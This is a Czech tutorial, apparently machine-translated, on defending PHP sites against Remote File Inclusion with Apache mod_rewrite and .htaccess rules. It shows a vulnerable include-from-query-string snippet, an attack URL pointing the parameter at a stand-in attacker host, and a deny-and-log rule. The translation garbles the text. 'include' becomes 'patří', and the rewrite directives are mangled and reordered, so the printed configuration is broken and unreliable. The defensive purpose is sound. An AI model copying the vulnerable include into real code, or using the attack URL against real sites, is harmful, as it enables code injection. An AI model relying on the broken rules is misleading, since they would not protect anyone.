Použití mod_rewrite, aby se zabránilo začlenění vzdálených souborů

Jedním z nejčastějších útoků utrpěl webových stránek se provádí přes pokus o hlavičkové soubory obsahující škodlivý kód, teoreticky mluví o útoku je velmi jednoduché hrát, dělat tak jen proto, že soubor, který obsahuje škodlivý kód a URL typu prohlížeče.

Tento typ útoku, známý technický termín pro Remote File Zahrnutí nebo s jednoduchou zkratkou pro RFI, je často spojován s tzv. režimu vniknutí XSA (Cross-Server Attack) se obvykle provádí ohrozit bezpečnost webových stránek Pokud není webový server, což je faktor, který je ještě nebezpečnější pro RFI.

Chcete-li spustit útok RFI, útočník potřebuje "paměť" v rámci aplikace na to, aby jeho zařazení na dálku, tento "prostor" je obecně "díra" (chyba) zabezpečení, která z něj činí zranitelným skript.
Klasický případ úniku citlivých na RFI souvisí s kolem po stránkách názvy proměnných, jen jednoduchý kus kódu, jako to ohrozit aplikace:

 



 # Include souborů přes QueryString proměnné prošla







 patří ($ _GET ['strana']);

 

V kódu máme nedefinované proměnné, nebo spíše musí být definovány podle parametrů posílal přes QueryString, například, je-li přímé URL na stránku obsahující seznam navrhovaných bude vypadat takto:

 



 http://www.sito.com/index.php?pagina=news.php

 

hodnota proměnné $ page se rovná "Aktuality" útok na této žádosti může být provedeno tímto způsobem:

 



 http://www.sito.com/index.php?pagina=http://www.attacco.com/x.php

 

Soubor "x.php", v případě úspěšného útoku, by mohla obsahovat všechny typy škodlivého kódu a poškodit mnohem významnější a definitivní než jednoduchost útoku lze přemýšlet.

Naštěstí existuje několik obranných technik, které lze použít, aby se zabránilo takovým útokům, během této krátké diskusi budeme analyzovat založený na URL rewrite modulu (mod_rewrite), poskytuje webového serveru Apache, které mohou být využity metody jiné.

Jeden z klasických poslat návod na webový server Apache je použití klasické. Htaccess, které mají být zahrnuty do složky, kterou chcete chránit před útokem.

První způsob, který používáme, je vložit jednoduché pravidlo v souboru htaccess A.:

 RewriteCond% {QUERY_STRING} (.*)( http | https | ftp): \ / \ /(.*)







 ^(.+)$ RewriteRule - [F]

Pravidlo stanoví, že formulován QueryString ("{QUERY_STRING}") nemohou být předány argumenty obsahující slov "http", "https" a "ftp", bez ohledu na to, co je obsahem předchozí nebo následující ("(.*)" ) parametrů. Pokud se tak stane webový server vrátí chybu typu 403 (zakázáno).

Ti, kteří mají možnost přímého přístupu ke konfiguračním souboru Apache (httpd.conf), může být vložen v jedné nádobě s obsahem směrnice může mít vliv srovnatelný s pravidly stanovenými prededentemente:

 # Ujistěte se, že mod_rewrite je k dispozici







 <IfModule Mod_rewrite.c>







 # Aktivace URL přepsat motor

 





 RewriteEngine on

 





 # My jsme nastavili pravidla proti RFI







 RewriteCond% {QUERY_STRING} (.*)( http | https | ftp): \ / \ /(.*)







 # Odfiltrovat případné žádosti o zařazení a přirážky







 # Vraibile na životní prostředí [E = varname: hodnota]







 ^(.+)$ RewriteRule - [F, E = RFI: true]

 





 </ IfModule>

 





 # Creaimo záznam pokusů o RFI jsme identficato







 # Dříve pomocí "proměnné prostředí"







 CustomLog / nazev_slozky / rfi.log kombinaci env = RFI

Po napsání této směrnice do konfiguračního souboru, musíte uložit změny a restartovat webový server, který vstoupí v platnost, na vědomí, že na konci seznamu, a ven z kontejneru byla vložena žádost o vytvoření log souboru určena na žádosti od vzdálených souborů začlenění, sledování tohoto malého "Poznámky pro blokování útoků RFI," zjistíme, že pokusy Remote File začleňování na našich webových stránkách jsou méně časté než věřil.